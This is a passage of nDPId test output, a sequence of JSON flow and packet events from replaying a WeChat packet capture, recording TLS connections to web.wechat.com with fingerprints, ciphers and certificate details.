+00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":496,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167452759,"flow_last_seen":1492167453126,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167453126,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54099,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":497,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1492167453357,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167453357,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC4GJp3LzZeiwKgBZwG701Rfi5PhohYVUqASN8gDZQAAAgQFoAQCCApF0gXVADEbmgEDAwc="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":498,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1492167453357,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167453357,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0DsxAAEAGBnnAqAFny82XotNUAbuiFhVSX4uT4oAQAOVoqQAAAQEICgAxG\/FF0gXV"} 
+00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":500,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167452759,"flow_last_seen":1492167453494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167453494,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54099,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":502,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167452759,"flow_last_seen":1492167453503,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1492167453503,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54099,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":513,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167453010,"flow_last_seen":1492167454373,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167454373,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54100,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":515,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167454457,"flow_last_seen":1492167454457,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167454457,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54101,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":515,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1492167454457,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167454457,"pkt":"8IQvSpdgeJKcD6iOCABFAAA86XpAAEAGK8LAqAFny82XotNVAbue7PR+AAAAAKACchAqvwAAAgQFtAQCCAoAMR0EAAAAAAEDAwc="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":516,"source":"wechat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167454458,"flow_last_seen":1492167454458,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167454458,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":516,"source":"wechat.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1492167454458,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167454458,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8cSZAAEAGpBbAqAFny82XotNWAbsdO2wiAAAAAKACchA0zAAAAgQFtAQCCAoAMR0EAAAAAAEDAwc="} +00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":521,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167453010,"flow_last_seen":1492167454734,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":208,"midstream":0,"thread_ts_msec":1492167454734,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54100,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":523,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167453010,"flow_last_seen":1492167454734,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":335,"midstream":0,"thread_ts_msec":1492167454734,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54100,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":530,"source":"wechat.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1492167454801,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167454801,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG701bGHEoeHTtsI6ASN8gRwgAAAgQFoAQCCApF0gdIADEdBAEDAwc="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":531,"source":"wechat.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1492167454802,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167454802,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0cSdAAEAGpB3AqAFny82XotNWAbsdO2wjxhxKH4AQAOV3BwAAAQEICgAxHVpF0gdI"} 
+00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":532,"source":"wechat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167454458,"flow_last_seen":1492167454802,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167454802,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54102,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":536,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167454818,"flow_last_seen":1492167454818,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167454818,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54103,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":536,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1492167454818,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167454818,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8NuJAAEAG3lrAqAFny82XotNXAbvn9Cu8AAAAAKACchCqHQAAAgQFtAQCCAoAMR1eAAAAAAEDAwc="} 
+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":537,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1492167454836,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167454836,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC4GJp3LzZeiwKgBZwG701XgAvN\/nuz0f6ASN8ip9gAAAgQFoAQCCApFraHjADEdBAEDAwc="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":538,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1492167454836,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167454836,"pkt":"8IQvSpdgeJKcD6iOCABFAAA06XtAAEAGK8nAqAFny82XotNVAbue7PR\/4ALzgIAQAOUPMwAAAQEICgAxHWNFraHj"} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":539,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167454457,"flow_last_seen":1492167454837,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167454837,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54101,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":544,"source":"wechat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167454458,"flow_last_seen":1492167455179,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3116,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":559,"midstream":0,"thread_ts_msec":1492167455179,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54102,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":546,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1492167455179,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167455179,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG701d\/O17O5\/QrvaASN8geewAAAgQFoAQCCApFraI2ADEdXgEDAwc="} 
+00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":547,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1492167455179,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167455179,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0NuNAAEAG3mHAqAFny82XotNXAbvn9Cu9fztez4AQAOWDvAAAAQEICgAxHbhFraI2"} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":550,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167454818,"flow_last_seen":1492167455180,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167455180,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54103,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":558,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167454457,"flow_last_seen":1492167455193,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167455193,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54101,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":560,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167454457,"flow_last_seen":1492167455196,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1492167455196,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54101,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 
+00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":567,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167454818,"flow_last_seen":1492167455501,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167455501,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54103,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":569,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167454818,"flow_last_seen":1492167455502,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167455502,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54103,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":577,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167455528,"flow_last_seen":1492167455528,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167455528,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54104,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":577,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1492167455528,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167455528,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8kudAAEAGglXAqAFny82XotNYAbvneYz3AAAAAKACchBIqgAAAgQFtAQCCAoAMR4QAAAAAAEDAwc="} 
+00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":613,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1492167455891,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167455891,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG701iyhnqT53mM+KASN8htQwAAAgQFoAQCCApFraLqADEeEAEDAwc="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":614,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1492167455891,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167455891,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0kuhAAEAGglzAqAFny82XotNYAbvneYz4soZ6lIAQAOXShAAAAQEICgAxHmpFraLq"} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":615,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167455528,"flow_last_seen":1492167455891,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167455891,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54104,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":648,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167455528,"flow_last_seen":1492167456251,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167456251,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54104,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 